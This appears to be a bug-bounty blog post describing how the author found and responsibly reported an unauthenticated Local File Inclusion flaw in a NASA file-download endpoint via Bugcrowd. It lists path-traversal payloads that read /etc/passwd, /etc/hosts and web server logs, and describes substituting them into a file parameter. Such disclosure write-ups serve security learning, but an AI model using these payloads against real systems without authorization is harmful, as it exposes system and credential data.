Introduction
When it comes to hacking, persistence is key. Sometimes, an initial vulnerability might seem insignificant, but with enough time and creative thinking, it can turn into a critical security issue. In this blog post, I will walk you through how I discovered a Local File Inclusion (LFI) vulnerability that earned me a P1 severity rating on Bugcrowd.
But before diving into the technical details, let’s first understand what Local File Inclusion (LFI) is.
What is Local File Inclusion (LFI)?
Local File Inclusion (LFI) is a server-side vulnerability that allows an attacker to include local files on the server. It usually occurs when a web application dynamically loads files without properly validating the input. If exploited, an attacker can read sensitive system files, gain access to source code, or in some cases, achieve Remote Code Execution (RCE).
Common payloads for testing LFI vulnerabilities include:
../../../../etc/passwd
../../../../etc/hosts
../../../../var/log/apache2/access.log
By leveraging such attacks, an attacker can retrieve sensitive information and potentially escalate their privileges within the system.
Now, let’s dive into how I leveraged LFI to hack NASA.
The Beginning: An Initial Useless Bug
Back in 2020/2021, before NASA joined Bugcrowd’s VDP (Vulnerability Disclosure Program), I had already found and reported numerous vulnerabilities in their systems, including:
- Reflected & Stored XSS
- Insecure Direct Object References (IDOR)
- Personally Identifiable Information (PII) Disclosure
- Other critical security flaws
However, I wasn’t satisfied. I wanted something bigger something that could truly make an impact. So, I kept testing the same domain for months, hoping to find a high-impact vulnerability.
At first, I discovered an XSS vulnerability, but unfortunately, it was a Self-XSS, meaning it wasn’t exploitable in any meaningful way. Not even CSRF or Clickjacking could be leveraged to weaponize it. It was a dead end.
But I didn’t stop there.
Understanding the S3 Bucket
Before moving forward, let’s briefly explain what an S3 bucket is.
Amazon S3 (Simple Storage Service) is an object storage service widely used for storing and retrieving files in the cloud. Permissions on an S3 bucket determine whether it is public or private, and whether it allows read and/or write access. In this case, I discovered that the S3 bucket used by NASA was readable but NOT writable.
Finding the Key Vulnerability: LFI in an FTP Integration
While continuing my testing, I came across a user registration page that allowed interactions with a planetary database. Naturally, I started testing SQL injection, but no luck, NASA’s security measures were solid.
Then, something interesting caught my attention. There was a video tutorial explaining how users could interact with the database queries. Within the tutorial, I noticed that files were being downloaded from an FTP server that was linked to an S3 bucket. The catch? The S3 bucket was readable but NOT writable.
I then initiated passive crawling and carefully analyzed the Burp Suite requests. One specific request stood out, and that’s where the real breakthrough happened.
Exploiting the Vulnerability
The request I found was responsible for downloading .TAR
files from the FTP server, which was backed by S3. However, it wasn’t a standard GET request, Burp Suite couldn’t automatically crawl the parameter.
Upon intercepting the request, I discovered something in the body parameter:
/FTP/some/some/some/some/file.tar.gz
This was part of the file parameter.
After further testing, I realized I could manipulate the file path within the parameter. So, I decided to try classic LFI payloads:
/etc/passwd
To my surprise, I received a full response containing the system’s /etc/passwd
file.
The Impact and Reporting
After confirming the vulnerability, I checked if I could write to the S3 bucket and potentially upload malicious scripts. Unfortunately, the bucket was not writable.
Still, the LFI attack alone was severe enough, as it allowed me to access:
- System files (/etc/passwd, /etc/hosts)
- Configuration details about the backend environment
- Potentially sensitive logs containing credentials or API keys
I stopped my testing at this point, as further exploitation would go beyond the responsible disclosure scope. However, based on the information I retrieved, it was highly likely that this could be escalated into Remote Code Execution (RCE).
I documented everything thoroughly and submitted my report to Bugcrowd, where it was quickly validated and triaged as a P1 (Critical) vulnerability.
To make things even more interesting, I initially assumed that this vulnerability was only accessible to authenticated users. However, after further testing, I discovered that it was accessible even to unauthenticated users. This meant that anyone could exploit it with a simple cURL request, making the impact even more critical.
PoC of Unauth LFI:
Conclusion
This experience highlights the importance of persistence in security research. What started as a seemingly useless bug turned into an FTP misconfiguration that ultimately led to LFI and potential RCE.
Key takeaways from this research:
- Never dismiss an initial finding A vulnerability that seems low-impact at first might be a gateway to something much more severe.
- Always think outside the box I found the vulnerability through a video tutorial, something most people would overlook.
- Understanding request patterns is crucial Burp Suite couldn’t detect the vulnerable parameter, but manual testing made the difference.
- Responsible disclosure is key Even though I could have explored RCE, I stopped at LFI to ensure ethical reporting.
- Always test authentication assumptions The vulnerability turned out to be unauthenticated, making it even more severe.
This vulnerability earned me a P1 severity rating on Bugcrowd, proving that creativity and patience can lead to huge security discoveries. If you’re passionate about ethical hacking, keep testing, keep learning, and never give up.